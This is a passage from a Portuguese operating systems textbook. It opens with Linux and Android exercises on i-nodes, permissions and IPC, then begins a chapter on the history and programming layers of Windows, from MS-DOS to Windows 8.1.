Na Figura 10.24, tanto Fred quanto Lisa têm acesso ao 
arquivo x em seus respectivos diretórios após ligação. 
Esse acesso é completamente simétrico no sentido de 
que qualquer coisa que um puder fazer com ele o outro 
também pode fazer? 

Como já vimos, nomes de caminhos absolutos são pro- 
curados começando no diretório raiz e nomes de cami- 
nhos relativos são procurados começando no diretório 
de trabalho. Sugira uma maneira eficiente de implemen- 
tar ambos os tipos de buscas. 

Quando o arquivo /usr/ast/work/f é aberto, vários aces- 
sos de disco são necessários para ler o i-nodo e blocos do 
diretório. Calcule o número de acessos de disco neces- 
sários sob o pressuposto de que o i-nodo para o diretório 
raiz está sempre na memória, e todos os diretórios têm 
um bloco de comprimento. 

Um i-nodo Linux tem 12 endereços de disco para blocos 
de dados, assim como os endereços de blocos indiretos 
únicos, duplos e triplos. Se cada um deles contém 256 
endereços de disco, qual é o tamanho do maior arquivo 
que pode ser tratado, presumindo que um bloco de disco 
tem 1 KB? 

Quando um i-nodo é lido do disco durante o processo de 
abertura de um arquivo, ele é colocado em uma tabela de 
i-nodo na memória. Essa tabela tem alguns campos que 
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não estão presentes no disco. Um deles é um contador 
que controla o número de vezes que o i-nodo foi aberto. 
Por que esse campo é necessário? 

Em plataformas com múltiplas CPUs, o Linux mantém 
uma fila de execução para cada CPU. É uma boa ideia? 
Explique a sua resposta. 

O conceito de módulos carregáveis é útil no sentido de 
que drivers de dispositivos novos podem ser carregados 
no núcleo enquanto o sistema está executando. Forneça 
duas desvantagens desse conceito. 

Threads pdflush podem ser despertos periodicamen- 
te para escrever de volta para o disco páginas mui- 
to antigas — mais velhas que 30 s. Por que isso é 
necessário? 

Após uma queda do sistema e reinicialização, normal- 
mente é executado um programa de recuperação. Su- 
ponha que esse programa descobre que a contagem de 
ligações em um i-nodo de um disco é 2, mas somente 
uma entrada de diretório referencia o i-nodo. Ele pode 
consertar o problema, e se afirmativo, como? 

Faça uma conjetura educada sobre qual chamada de sis- 
tema Linux é a mais rápida. 

É possível desligar (unlink) um arquivo que nunca foi 
ligado (linked)? O que acontece? 

Com base nas informações apresentadas neste capítulo, 
se um sistema de arquivos ext2 do Linux fosse colocado 
em um disquete de 1,44 MB, qual o montante máximo 
de dados do arquivo do usuário que poderiam ser arma- 
zenados nesse disquete? Presuma que os blocos de disco 
têm 1 KB. 

Diante de todos os problemas que os estudantes podem 
causar se eles tornarem-se superusuários, por que esse 
conceito existe? 

Um professor compartilha arquivos com seus alunos 
colocando-os em um diretório acessível publicamente 
no sistema Linux do Departamento de Computação. Um 
dia ele se dá conta de que um arquivo colocado ali no dia 
anterior foi deixado passível de ser escrito. Ele muda as 
permissões e verifica que o arquivo está idêntico à cópia 
mestre. No dia seguinte ele descobre que o arquivo foi 
modificado. Como isso poderia ter acontecido e como 
poderia ter sido evitado? 

O Linux dá suporte a uma chamada de sistema fsuid. Di- 
ferentemente de setuid, que concede ao usuário todos os 
direitos do id efetivo associado com um programa que ele 
está executando, fsuid concede ao usuário que está exe- 
cutando o programa direitos especiais apenas em relação 
ao acesso aos arquivos. Por que essa característica é útil? 
Em um sistema Linux, vá para o diretório /proc/##H###, 
onde * é um numero decimal correspondente a um 
processo atualmente executando no sistema. Responda 
às seguintes questões junto com uma explicação: 
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(a) Qual é o tamanho da maioria dos arquivos nesse 
diretório? 
(b) Quais são as configurações de horário e data da 
maioria dos arquivos? 
(c) Qual tipo de direito de acesso é fornecido aos usu- 
ários para acessar Os arquivos? 
Se você está escrevendo uma atividade Android para 
exibir uma página web em um navegador, como poderia 
implementar o seu estado de atividade para minimizar a 
quantidade de estado salvo sem perder nada importante? 
Se você está escrevendo um código de rede no Android 
e usa um soquete para baixar um arquivo, o que você 
deveria considerar fazer que é diferente do que em um 
sistema Linux padrão? 
Se você está projetando algo como o processo zygote do 
Android para um sistema que terá múltiplos threads execu- 
tando em cada processo criado (forked) a partir dele, você 
preferiria começar esses threads no zygote ou após o fork? 
Imagine que você use o IPC Binder do Android para 
enviar um objeto para outro processo. Mais tarde você 
recebe um objeto de uma chamada para seu processo e 
descobre que recebeu o mesmo objeto previamente en- 
viado. O que você pode presumir ou não a respeito do 
chamador no seu processo? 
Considere um sistema Android que, imediatamente após 
ser inicializado, segue esses passos: 
1. A aplicação home (ou lançador) é inicializada. 
2. Aaplicação de e-mail começa a sincronizar sua cai- 
xa de correio em segundo plano. 
3. O usuário lança um aplicativo de câmera. 
O usuário lança um aplicativo de navegação na 
web. 
A página na web que o usuário está vendo agora no apli- 
cativo do navegador exige cada vez mais RAM, até que 
ela precisa de tudo o que conseguir. O que acontece”? 
Escreva um shell mínimo que permita que comandos 
simples sejam iniciados. Ele deve permitir também que 
eles sejam iniciados no segundo plano. 
Usando a linguagem de montagem e chamadas BIOS, 
escreva um programa que inicialize a si mesmo a partir 
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de um disquete em um computador da classe Pentium. 
O programa deve usar chamadas da BIOS para ler do 
teclado e ecoar os caracteres digitados, apenas para de- 
monstrar que está executando. 

Escreva um programa terminal simples para conectar dois 
computadores Linux via portas seriais. Use as chamadas 
de gerenciamento POSIX para configurar as portas. 
Escreva uma aplicação cliente servidor que, ao ser so- 
licitada, transfira um grande arquivo via soquetes. 
Reimplemente a mesma aplicação usando a memória 
compartilhada. Qual versão você espera que tenha um 
melhor desempenho? Por quê? Conduza medidas de 
mensuração com o código que você escreveu e usando 
diferentes tamanhos de arquivos. Quais são suas obser- 
vações? O que você acha que acontece dentro do núcleo 
do Linux que resulta nesse comportamento? 
Implemente uma biblioteca de threads ao nível do 
usuário básica para executar sobre o Linux. A bi- 
blioteca API deve ter chamadas de funções como 
mythreads init, mythreads create, mythreads . 
join, mythreads exit, mythreads yield, mythrea- 
ds self, e talvez algumas outras mais. Em seguida 
implemente essas variáveis de sincronização para 
habilitar operações concorrentes: mythreads mu- 
tex init, mythreads mutex lock, mythreads mu- 
tex unlock. Antes de começar, defina claramente a 
API e especifique a semântica de cada chamada. Em 
seguida implemente a biblioteca ao nível do usuário 
com um escalonador preemptivo circular (round-ro- 
bin) simples. Você também precisará escrever uma 
ou mais aplicações de múltiplos threads, que usam 
sua biblioteca, a fim de testá-la. Por fim, substitua o 
mecanismo de escalonamento simples por outro que 
se comporte com o escalonador Linux 2.6 O(1) des- 
crito neste capítulo. Compare o desempenho que a(s) 
sua(s) aplicação(ões) recebe(m) quando usando cada 
um dos escalonadores. 

Escreva um script de shell que exiba alguma informação 
de sistema importante como quais processos estão exe- 
cutando, seu diretório home e atual, tipo de processador, 
utilização de CPU atual etc. 


CAPÍTULO 


Windows é um sistema operacional moderno que é 
executado em PCs, laptops, tablets e smartphones 
de consumidores, bem como em PCs de desktop 
e servidores corporativos. O Windows também é 
o sistema operacional usado no sistema de jogos 
Xbox da Microsoft e infraestrutura de computação em 
nuvem Azure. A versão mais recente é o Windows 8.1. 
Neste capítulo, estudaremos várias características do 
Windows 8, começando com um breve histórico e, a 
seguir, passando para sua arquitetura. Depois disso es- 
tudaremos seus processos, gerenciamento de memória, 
caching, E/S, sistema de arquivos e, por fim, segurança. 





11.1 História do Windows até o 
Windows 8.1 


O desenvolvimento do sistema operacional Windows 
para PCs e também para servidores pode ser dividido 
em quatro eras: MS-DOS, Windows baseado no MS- 
-DOS, Windows baseado em NT e Windows mo- 
derno. Em termos técnicos, cada um desses sistemas é 
substancialmente diferente dos outros. Cada um domi- 
nou o mercado durante décadas distintas da história dos 
computadores pessoais. A Figura 11.1 mostra as datas 
dos principais lançamentos de sistemas operacionais da 
Microsoft para desktops. A seguir, delinearemos breve- 
mente cada uma dessas familias. 


11.1.1 Década de 1980: o MS-DOS 


No inicio dos anos 1980, a IBM — na época a maior 
e mais poderosa empresa de computadores do mundo 








— produzia um computador pessoal baseado no micro- 
processador Intel 8088. Desde meados dos anos 1970, a 
Microsoft era a principal fornecedora da linguagem de 
programação BASIC, para microcomputadores de 8 bits 
baseados no 8080 e no Z-80. Quando a IBM sondou a 
Microsoft sobre a licença da linguagem BASIC para o 
novo IBM PC, a Microsoft prontamente concordou e su- 
geriu que a IBM contatasse a Digital Research para tentar 
licenciar o sistema operacional CP/M, já que a Micro- 
soft ainda não atuava no ramo de sistemas operacionais. 
A IBM foi até a Digital Research, mas seu presidente, 
Gary Kildall, estava muito ocupado para atendê-la. Esse 
provavelmente foi o maior erro de toda a história corpo- 
rativa, pois, se ele tivesse licenciado o CP/M para a IBM, 
Kildall provavelmente teria se tornado o homem mais 
rico do planeta. Recusada por Kildall, a IBM retornou a 
Bill Gates, o cofundador da Microsoft, e lhe pediu ajuda 
novamente. Pouco tempo depois, a Microsoft comprou 
um clone do CP/M de uma empresa local, a Seattle Com- 
puter Products, criou uma versão do sistema para o IBM 
PC e o licenciou para a IBM. O sistema foi então reno- 
meado para MS-DOS 1.0 (MicroSoft Disk Operating 
System — sistema operacional em disco da Microsoft) e 
distribuído com o primeiro IBM PC, em 1981. 

O MS-DOS era um sistema operacional de 16 bits 
em modo real, dedicado a um único usuário, orientado 
à linha de comandos e com 8 KB de código residente 
na memória. Ao longo da década seguinte, tanto o PC 
quanto o MS-DOS continuaram a evoluir, acrescentando 
mais recursos e capacidades. Em 1986, quando a IBM 
construiu o PC/AT baseado no Intel 286, o MS-DOS 
passou a ter 36 KB, mas continuou a ser um sistema 
operacional orientado à linha de comandos, executando 
uma aplicação por vez. 
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Ano MS-DOS Windows basea- Windows baseado | Windows Observações 
do no MS-DOS em NT moderno 
1981 1.0 Distribuição inicial para IBM PC 
1983 2.0 Suporte para PC/XT 
1984 3.0 Suporte para PC/AT 
1990 3.0 Dez milhões de cópias em 2 anos 
1991 5.0 Incluído gerenciamento de memória 
1992 3.1 Funcionava somente em 286 ou superior 
1993 NT 3.1 
1995 7.0 95 MS-DOS embutido no Win 95 
1996 NT 4.0 
1998 98 
2000 8.0 Me 2000 Win Me era inferior ao Win 98 
2001 XP Substituiu o Win 98 
2006 Vista Vista não conseguiu suplantar o XP 
2009 7 Melhoria significativa sobre o Vista 
2012 8 Primeira versão moderna 
2013 8.1 Microsoft passou para lançamentos rápidos 











11.1.2 Década de 1990: Windows baseado 
no MS-DOS 


Inspirado na interface gráfica do usuário de um siste- 
ma desenvolvido por Doug Engelbart no Stanford Rese- 
arch Institute e mais tarde melhorado na Xerox PARC, 
bem como em seus progenitores comerciais, o Apple 
Lisa e o Apple Macintosh, a Microsoft decidiu dar ao 
MS-DOS uma interface gráfica com o usuário chama- 
da Windows. As primeiras duas versões do Windows 
(lançadas em 1985 e 1987) não fizeram muito sucesso, 
em parte por causa das limitações do hardware do PC 
disponível na época. Em 1990, a Microsoft lançou o 
Windows 3.0 para o Intel 386 e, em seis meses, vendeu 
mais de um milhão de cópias. 

O Windows 3.0 não era bem um sistema operacional, 
mas um ambiente gráfico construído sobre o MS-DOS, 
que ainda controlava a máquina e o sistema de arquivos. 
Todos os programas funcionavam no mesmo espaço de 
endereçamento, e um erro em um deles poderia fazer o 
sistema inteiro parar. 

Em agosto de 1995, foi lançado o Windows 95, que 
continha muitas das características de um sistema ope- 
racional maduro, inclusive memória virtual, gerencia- 
mento de processos e multiprogramação, e que incluía 


interfaces de programação de 32 bits. Entretanto, ele 
ainda não era totalmente seguro, e o isolamento entre as 
aplicações e o sistema operacional era precário. Os pro- 
blemas de instabilidade continuaram mesmo nas ver- 
sões subsequentes — Windows 98 e Windows Me —, 
em que o MS-DOS continuava a executar código as- 
sembly de 16 bits no coração do sistema operacional 
Windows. 


11.1.3 Década de 2000: Windows baseado no NT 


No final dos anos 1980, a Microsoft percebeu que 
construir um sistema operacional moderno sobre o MS- 
-DOS não seria o melhor caminho. O hardware do PC 
continuava a melhorar sua velocidade e sua capacida- 
de, e seu mercado acabaria colidindo com os mercados 
de estações de trabalho e servidores empresariais, nos 
quais o UNIX era o sistema operacional dominante. 
A Microsoft também estava preocupada com a possi- 
bilidade de a família de processadores Intel deixar de 
ser competitiva, já que ela estava sendo ameaçada pe- 
las arquiteturas RISC. Para lidar com essas questões, a 
Microsoft contratou um grupo de engenheiros da DEC, 
liderado por David Cutler, um dos principais projetistas 


do sistema operacional VMS da DEC (entre outros). 
Cutler deveria produzir, do zero, um novíssimo sistema 
operacional de 32 bits que deveria implementar o OS/2, 
a API do sistema operacional que, na época, a Microsoft 
desenvolvera em conjunto com a IBM. Os documentos 
originais do projeto desenvolvido pela equipe de Cutler 
foram chamados de sistema NT OS/2. 

Chamado de NT, acrônimo de New Technology 
(nova tecnologia) e também porque o processador-alvo 
original era o novo Intel 860 (codinome N10), o sistema 
de Cutler era destinado a funcionar em diferentes pro- 
cessadores e enfatizava a segurança e a confiabilidade, 
bem como a compatibilidade com as versões Windows 
baseadas no MS-DOS. A experiência de Cutler na DEC 
aparece claramente em várias partes, havendo mais do 
que uma simples similaridade entre o projeto do NT, do 
VMS e de outros sistemas operacionais projetados por 
Cutler, conforme mostra a Figura 11.2. 

Os programadores familiarizados apenas com o 
UNIX acham a arquitetura do NT bastante diferente 
não só pela influência do VMS, mas também pelas di- 
ferenças nos sistemas de computação comuns na épo- 
ca do projeto. A primeira versão do UNIX surgiu em 
1970. Era um sistema de 16 bits para um único proces- 
sador, com uma memória mínima, sistemas de troca 
nos quais o processo era a unidade de concorrência e 
composição e no qual fork/exec não eram operações 
dispendiosas (já que os sistemas de troca sempre co- 
piam os processos para o disco). O NT foi projetado 
no início da década de 1990, quando eram comuns os 
sistemas de 32 bits para multiprocessadores capazes 
de lidar com muitos bytes e memória virtual. No NT, 
threads são a unidade de concorrência, bibliotecas di- 
nâmicas são as unidades de composição e fork/exec 
são implementados por uma única operação para criar 
um novo processo e executar outro programa sem que 
se faça uma cópia primeiro. 

A primeira versão do Windows baseado em NT 
(Windows NT 3.1) foi lançada em 1993. Esse número 
3.1 inicial da versão foi escolhido para compatibilizá-lo 
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com o número da versão do sistema de 16 bits mais 
popular da Microsoft, o Windows 3.1. O projeto em 
conjunto com a IBM não teve sucesso e, embora as 
interfaces do OS/2 ainda fossem suportadas, as pri- 
meiras interfaces eram extensões 32 bits das APIs do 
Windows, denominadas Win32. Entre o início e o pri- 
meiro lançamento do NT, lançou-se o Windows 3.0, 
que foi extremamente bem-sucedido comercialmente. 
Ele também conseguia executar programas Win32, 
mas apenas por meio da biblioteca de compatibilidade 
Win32s. 

Assim como a primeira versão do Windows baseada 
no MS-DOS, a versão do Windows baseada em NT não 
obteve sucesso imediato. O NT demandava mais me- 
mória, existiam poucas aplicações 32 bits disponíveis, 
e as incompatibilidades entre os drivers de dispositivos 
e as aplicações fizeram com que muitos usuários con- 
tinuassem utilizando o Windows baseado no MS-DOS 
— que a Microsoft ainda estava melhorando e que le- 
vou ao lançamento do Windows 95, em 1995. Como o 
NT, o Windows 95 oferecia interfaces de programação 
32 bits nativas, mas com melhor compatibilidade entre 
os programas e as aplicações 16 bits existentes. Não é 
surpresa alguma o fato de que o sucesso inicial do NT 
tenha se dado no mercado de servidores, no qual com- 
petia com o VMS e o NetWare. 

O NT alcançou suas metas de portabilidade, e os lan- 
çamentos de 1994 e 1995 acrescentaram suporte para as 
arquiteturas MIPS (little-endian) e PowerPC. A primei- 
ra atualização importante no NT veio em 1996, com a 
chegada do Windows NT 4.0. Esse sistema apresentava 
o poder, a segurança e a confiabilidade do NT, mas tam- 
bém dava suporte à mesma interface com o usuário do 
então popular Windows 95. 

A Figura 11.3 mostra a relação entre a API do Win32 
e o Windows. Para o sucesso do NT, era crucial que exis- 
tisse uma API comum tanto nas versões do Windows ba- 
seadas no MS-DOS quanto naquelas baseadas em NT. 

Essa compatibilidade facilitou a migração de usuá- 
rios de Windows 95 para o NT, e o sistema operacional 


[FIGURA 11.2] Sistemas operacionais DEC desenvolvidos por David Cutler. 


























Ano Sistema operacional DEC Características 
1973 RSX-11M 16 bits, multiusuário, tempo real, troca (swapping) 
1978 VAX/VMS 32 bits, memoria virtual 
1987 VAXELAN Tempo real 
1988 PRISM/Mica Cancelado em virtude do MIPS/Ultrix 
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transformou-se em um forte participante, tanto no mer- 
cado de desktops quanto no de servidores. Entretanto, 
os consumidores não estavam tão dispostos a adotar 
novas arquiteturas e, das quatro arquiteturas suporta- 
das pelo Windows NT 4.0 em 1996 (o DEC Alpha foi 
incluído nessa distribuição), somente a x86 (ou seja, 
a família Pentium) continuava ativamente suportada 
quando do lançamento da versão seguinte, denominada 
Windows 2000. 

O Windows 2000 representou uma significativa 
evolução no NT. As principais tecnologias incluídas 
foram a característica plug-and-play (para os consu- 
midores que instalavam novas placas PCI, eliminava- 
-se a necessidade de manipular pequenos contatos, os 
jumpers, nas placas), os serviços de diretório de rede 
(para clientes empresariais), a melhora no gerencia- 
mento de energia (para os notebooks) e uma melhor 
GUI (para todos). 

O sucesso técnico do Windows 2000 levou a Mi- 
crosoft a acelerar a depreciação do Windows 98, por 
meio da melhora na compatibilidade entre aplicações e 
dispositivos nas distribuições seguintes do NT, denomi- 
nada Windows XP. Este incluía uma interface gráfica 
mais agradável e amigável, que reforçava a estratégia 
da Microsoft de atrair consumidores e colher os frutos 
à medida que esses consumidores pressionavam seus 
empregadores a adotar sistemas com os quais eles já 
estavam familiarizados. A estratégia foi extremamente 
bem-sucedida e o Windows XP acabou instalado em 
centenas de milhões de PCs no mundo todo ao longo 
de seus primeiros anos, o que permitiu que a Microsoft 
alcançasse sua meta de efetivamente pôr fim à era do 
Windows baseado em MS-DOS. 

A Microsoft acompanhou o sucesso do Windows 
XP e embarcou no desenvolvimento de um lançamento 
audacioso, que causou grande entusiasmo entre os con- 
sumidores donos de PCs. O resultado, denominado Win- 
dows Vista, foi concluído em 2006, mais de cinco anos 
depois do lançamento do XP. O Windows Vista trouxe 


outra inovação no projeto de interface gráfica e novas ca- 
racterísticas de segurança, mas a maioria das mudanças 
relacionava-se às experiências e às capacidades visíveis 
pelo usuário. A tecnologia por trás do sistema aumentava 
gradativamente, com muita limpeza no código e melho- 
rias em desempenho, escalabilidade e confiabilidade. A 
versão do Vista para servidores (Windows Server 2008) 
foi lançada cerca de um ano depois da versão para con- 
sumidores. Ela compartilha com o Vista os mesmos com- 
ponentes principais do sistema, como núcleo, drivers, 
bibliotecas de baixo nível e programas. 

A história humana por trás do desenvolvimento ini- 
cial do NT é relatada no livro Show-stopper (ZACHA- 
RY, 1994) e fala bastante sobre os principais envolvidos 
e as dificuldades de levar adiante um projeto de software 
tão ambicioso. 


11.1.4 Windows Vista 


A distribuição do Windows Vista marcou o encer- 
ramento da primeira fase do projeto de sistema opera- 
cional mais extenso já visto. Os planos iniciais eram 
tão ambiciosos que, poucos anos depois do início do 
desenvolvimento, o Vista precisou ser reiniciado com 
um escopo menor. Os planos de basear-se na linguagem 
CH .NET foram arquivados, assim como a ideia de im- 
plementar algumas características importantes — como 
o sistema de armazenamento unificado do WinFS para 
a busca e organização de dados de fontes distintas. O 
tamanho do sistema operacional inteiro surpreende. A 
distribuição original do NT tinha três milhões de linhas 
de código em C/C++ e cresceu para 16 milhões no NT 
4, 30 milhões no Windows 2000 e 50 milhões no XP. 
No Vista ela tem mais de 70 milhões e ainda mais nos 
Windows 7 e 8. 

Muito desse tamanho se deve a énfase da Microsoft 
em incluir novos recursos a cada nova distribuição. No 
diretório principal system32, existem 1.600 bibliotecas 
dinâmicas (DLLs) e 400 executáveis (EXEs), e esse 


ein: TEE] A API Win32 permite que os programas sejam executados em quase todas as versões do Windows. 
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número não inclui os outros diretórios repletos de ap- 
plets incluídos no sistema operacional e que permitem 
que os usuários acessem à internet, ouçam músicas e 
assistam a vídeos, enviem e-mails, varram documentos, 
organizem fotos e até mesmo criem seus próprios fil- 
mes. Como a Microsoft quer que os usuários migrem 
para as novas versões, ela mantém a compatibilidade 
por meio da manutenção de todas as características, 
APIs, applets (pequenas aplicações) etc., da versão an- 
terior. Poucas coisas são excluídas. O resultado é que o 
Windows foi crescendo intensamente a cada nova dis- 
tribuição. A mídia de distribuição do Windows passou 
do disquete para o CD e, com o Windows Vista, para o 
DVD. A tecnologia acompanha esse ritmo, e processa- 
dores mais rápidos e memórias maiores permitem que 
os computadores se tornem mais rápidos, apesar de todo 
este inchaço. 

Infelizmente para a Microsoft, o Windows Vista foi 
lançado em uma época em que os clientes estavam fi- 
cando fascinados com computadores menos dispendio- 
sos, como notebooks mais simples e netbooks. Essas 
máquinas usavam processadores mais lentos para redu- 
zir o custo e poupar a vida da bateria e, em suas primei- 
ras gerações, limitavam os tamanhos de memória. Ao 
mesmo tempo, o desempenho do processador deixou de 
melhorar no mesmo ritmo anterior, por causa das difi- 
culdades na dissipação do calor criado por velocidades 
de relógio cada vez maiores. A Lei de Moore continua- 
va a ser mantida, mas os transistores adicionais estavam 
indo para novos recursos e múltiplos processadores, em 
vez de melhorias no desempenho do processador único. 
Todos os recursos adicionais no Windows Vista signifi- 
cavam que ele não funcionava bem nesses computado- 
res em relação ao Windows XP, e a distribuição nunca 
foi aceita de modo generalizado. 

Os problemas com o Windows Vista foram resolvi- 
dos na versão subsequente, o Windows 7. A Microsoft 
investiu muito em teste e automação de desempenho, 
nova tecnologia de telemetria e fortaleceu bastante os 
times encarregados da melhoria do desempenho, da 
confiabilidade e da segurança. Embora o Windows 7 
tivesse relativamente poucas mudanças funcionais em 
comparação com o Windows Vista, ele foi mais bem 
arquitetado e era mais eficiente. O Windows 7 rapida- 
mente suplantou o Vista e, por fim, o Windows XP, para 
ser a versão mais popular do Windows até o momento. 


11.1.5 Década de 2010: Windows moderno 


Na época em que o Windows 7 foi lançado, a in- 
dústria da computação mais uma vez começou a mudar 
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radicalmente. O sucesso do Apple iPhone como disposi- 
tivo de computação portátil e o advento do Apple iPad, 
prenunciaram uma mudança de mares que levou ao 
domínio dos tablets e smartphones Android de menor 
custo, assim como a Microsoft tinha dominado o setor 
de desktops nas três primeiras décadas da computação 
pessoal. Dispositivos pequenos, portáteis e ainda assim 
poderosos, com redes rápidas e onipresentes, estavam 
criando um mundo onde a computação móvel e os ser- 
viços baseados em rede se tornavam o paradigma do- 
minante. O antigo mundo dos computadores portáteis 
foi substituído por máquinas com telas pequenas que 
executavam aplicações que podiam ser prontamente 
baixadas da web. Essas aplicações não eram a varieda- 
de tradicional, como processamento de textos, planilhas 
eletrônicas e conexão a servidores corporativos. Em vez 
disso, forneciam acesso a serviços como busca na web, 
redes sociais, Wikipédia, streaming de música e vídeo, 
compras e navegação pessoal. Os modelos comerciais 
para computação também estavam mudando, com as 
oportunidades de propaganda tornando-se a maior força 
econômica por trás da computação. 

A Microsoft iniciou um processo de reprojetar-se 
como uma empresa de dispositivos e serviços, a fim de 
competir melhor com Google e Apple. Ela precisava de 
um sistema operacional que pudesse ser implementa- 
do por uma grande gama de dispositivos: smartphones, 
tablets, consoles de jogo, notebooks, desktops, servi- 
dores e a nuvem. O Windows, então, passou por uma 
evolução ainda maior do que com o Windows Vista, re- 
sultando no Windows 8. Porém, dessa vez a Microsoft 
aplicou as lições do Windows 7 para criar um produto 
bem projetado e com bom desempenho, além de menos 
inflado. 

O Windows 8 se baseou na abordagem modular 
MinWin que a Microsoft havia usado no Windows 7 
para produzir um núcleo de sistema operacional pe- 
queno, que pudesse ser estendido para dispositivos 
diferentes. O objetivo era que cada um dos sistemas 
operacionais para dispositivos específicos fosse mon- 
tado pela extensão desse núcleo com novas interfaces 
de usuário e recursos, oferecendo ainda uma expe- 
riência mais comum possível para os usuários. Essa 
técnica foi aplicada com sucesso ao Windows Phone 
8, que compartilha a maior parte dos binários do nú- 
cleo com o Windows para desktop e servidor. O su- 
porte do Windows para smartphones e tablets exigiu o 
suporte para a popular arquitetura ARM, além de no- 
vos processadores da Intel visando a esses dispositi- 
vos. O que faz com que o Windows 8 seja parte da era 
do Windows Moderno são as mudanças fundamentais 
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nos modelos de programação, conforme examinare- 
mos na próxima seção. 

O Windows 8 não foi recebido com aclamação pú- 
blica universal. Em particular, a falta do botão Iniciar 
na barra de tarefas (e seu menu associado) foi vista 
por muitos usuários como um grande erro. Outros se 
opuseram ao uso de uma interface tipo tablet em uma 
máquina desktop com um monitor grande. A Microsoft 
respondeu a estas e a outras críticas em 14 de maio de 
2013, distribuindo uma atualização chamada Windows 
8.1. Essa versão consertou tais problemas e ao mesmo 
tempo introduziu uma série de novos recursos, como a 
melhor integração com a nuvem, bem como diversos 
novos programas. Embora estejamos usando o termo 
mais genérico de “Windows 8” neste capítulo, na ver- 
dade, tudo aqui é uma descrição de como funciona o 
Windows 8.1. 


11.2 Programando o Windows 


Agora é a hora de começar nosso estudo técnico do 
Windows. Contudo, antes de entrar em detalhes da es- 
trutura interna, primeiro estudaremos a API nativa do 
NT para chamadas de sistema, o subsistema de pro- 
gramação Win32, introduzido como parte do Windows 
baseado no NT e o ambiente de programação WinRT 
moderno, introduzido com o Windows 8. 

A Figura 11.4 mostra as camadas do sistema opera- 
cional Windows. Abaixo das camadas de applets e da 
GUI estão as interfaces de programação sobre as quais 
as aplicações são construídas. Como na maioria dos sis- 
temas operacionais, as camadas são formadas por bi- 
bliotecas de código (DLLs), com as quais os programas 
se conectam dinamicamente para acessar os recursos 
do sistema operacional. O Windows também inclui um 
conjunto de interfaces de programação que são imple- 
mentadas como serviços que funcionam como processos 
separados. As aplicações se comunicam com serviços 
no modo usuário por meio de chamadas de procedimen- 
to remoto (Remote-Procedure-Calls — RPCs). 

O núcleo do sistema operacional NT é o programa 
de modo núcleo NTOS (ntoskrnl.exe), que oferece a 
tradicional interface de chamadas de sistema sobre a 
qual todo o restante do sistema operacional é montado. 
No Windows, apenas os programadores da Microsoft 
escrevem para a camada de chamadas de sistema. Todas 
as interfaces de modo usuário publicadas pertencem a 
personalidades do sistema operacional que são imple- 
mentadas utilizando subsistemas que funcionam no 
topo das camadas NTOS. 


Originalmente, o NT dava suporte a três persona- 
lidades: OS/2, POSIX e Win32. O OS/2 foi descarta- 
do no Windows XP. O suporte para POSIX por fim 
foi removido no Windows 8.1. Hoje, todas as apli- 
cações Windows são escritas para usar APIs que são 
montadas no topo do subsistema Win32, como a API 
WinFX no modelo de programação .NET. A API Win- 
FX inclui muitas das características do Win32 e, na 
verdade, muitas das funções na Biblioteca de Classe 
Base do WinFX são simplesmente invólucros para as 
APIs Win32. As vantagens do WinFX estão relaciona- 
das com a riqueza dos tipos de objetos suportados, as 
interfaces consistentes simplificadas e a aplicação do 
runtime de linguagem comum (Common Language 
Runtime — CLR) .NET, que inclui a coleta de lixo 
(GC — garbage collection). 

As versões modernas do Windows começam com 
o Windows 8, que introduziu o novo conjunto de APIs 
WinRT. O Windows 8 desencorajou a experiência da 
área de trabalho tradicional do Win32 em favor da exe- 
cução de uma única aplicação por vez na tela inteira, 
enfatizando o toque ao uso do mouse. A Microsoft viu 
isso como um passo necessário como parte da transi- 
ção para um único sistema operacional que funcionas- 
se com smartphones, tablets e consoles de jogos, além 
dos PCs e servidores tradicionais. As mudanças na GUI 
necessárias para dar suporte a esse novo modelo exi- 
gem que as aplicações sejam reescritas para um novo 
modelo de API, o Modern Software Development 
Kit, que inclui as APIs WinRT. As APIs WinRT são 
cuidadosamente preparadas para produzir um conjunto 
de comportamentos e interfaces mais consistente. Es- 
sas APIs possuem versões disponíveis para programas 
C++ e .NET, mas também JavaScript para aplicações 
hospedadas em um ambiente wwa.exe (Windows Web 
Application) tipo navegador. 

Além das APIs WinRT, muitas das APIs Win32 
existentes foram incluídas no MSDK (Microsoft De- 
velopment Kit). As APIs WinRT inicialmente dis- 
poníveis não foram suficientes para escrever muitos 
programas. Algumas das APIs Win32 incluídas foram 
escolhidas para limitar o comportamento das apli- 
cações. Por exemplo, as aplicações não podem criar 
threads diretamente com o MSDK, mas devem contar 
com o pool de threads do Win32 para executar ativida- 
des concorrentes dentro de um processo. Isso porque 
o Windows Moderno está afastando os programadores 
de um modelo de threading para um modelo de tare- 
fa, a fim de desvincular o gerenciamento de recursos 
(prioridades, afinidades do processador) do modelo de 
programação (especificando atividades concorrentes). 


[FIGURA 11.4] As camadas de programação no Windows Moderno. 
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Outras APIs Win32 omitidas incluem a maioria das 
APIs de memória virtual do Win32. Os programadores 
deverão contar com as APIs de gerenciamento de me- 
mória heap do Win32 em vez de tentar gerenciar dire- 
tamente os recursos de memória. As APIs que já foram 
desencorajadas na API Win32 também foram omitidas 
no MSDK, assim como todas as APIs ANSI. As APIs 
do MSDK são apenas Unicode. 

A escolha do termo Moderno para descrever um pro- 
duto como o Windows é surpreendente. Talvez, se hou- 
ver uma nova geração de Windows daqui dez anos, ela 
será chamada de Windows pós-Moderna. 

Ao contrário dos processos Win32 tradicionais, os 
processos que executam aplicações modernas possuem 
seus tempos de vida útil controlados pelo sistema opera- 
cional. Quando um usuário troca de aplicação, o sistema 


lhe dá alguns segundos para salvar seu estado e depois 
deixa de lhe dar mais recursos do processador até que o 
usuário retorne à aplicação. Se o sistema ficar com pou- 
cos recursos, o sistema operacional poderá terminar os 
processos da aplicação sem que ela sequer seja executada 
novamente. Quando o usuário retornar à aplicação em al- 
gum momento no futuro, ela será reiniciada pelo sistema 
operacional. As aplicações que precisam executar tarefas 
em segundo plano precisam se organizar especificamente 
para fazer isso usando um novo conjunto de APIs WinRT. 
A atividade em segundo plano é controlada cuidadosa- 
mente pelo sistema para aumentar a eficiência da bateria 
e impedir a interferência com a aplicação de primeiro pla- 
no que o usuário está utilizando atualmente. Essas mudan- 
ças foram feitas para fazer com que o Windows funcione 
melhor em dispositivos móveis. 
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No mundo desktop do Win32, as aplicações são 
distribuídas executando um instalador que faz parte 
da aplicação. As aplicações modernas precisam ser 
instaladas usando o programa AppStore do Windows, 
que distribuirá apenas aplicações cujo desenvolvedor 
realizou seu upload para a loja on-line da Microsoft. 
A Microsoft está seguindo o mesmo modelo bem-su- 
cedido introduzido pela Apple e adotado pelo Android. 
A Microsoft não aceitará aplicações na loja a menos 
